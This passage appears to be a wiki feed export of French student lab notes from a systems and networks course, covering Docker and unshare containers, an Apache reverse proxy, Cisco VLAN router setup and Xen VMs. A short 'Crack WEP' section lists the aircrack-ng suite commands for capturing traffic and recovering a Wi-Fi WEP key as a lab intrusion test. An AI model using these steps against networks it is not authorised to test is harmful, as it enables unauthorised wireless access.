  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6)&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49060</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49060"/>
				<updated>2018-12-21T09:33:24Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* TP PRA - Mise en place du routeur Catalyst 3650 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
==Séance 1 : 26/11/2018==&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage réseau IPV4 routé en deux sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage du réseau IPV4 non routée en sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
==Séance 2 : 27/11/2018==&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
===Mise en place du routeur et connexion à celui ci===&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
===Configuration du routeur : Configuration des ports===&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
===Mise en place de la machine virtuelle===&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
  xl create Dionysos.cfg&lt;br /&gt;
  xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
Dans /root/.profile&lt;br /&gt;
  &lt;br /&gt;
  http_proxy=&amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
  https_proxy=&amp;quot;https://proxy.polytech-lille.fr:3128&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
  xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
==Séance 3 : 10/12/2018==&lt;br /&gt;
&lt;br /&gt;
===Config Routeur 3560===&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
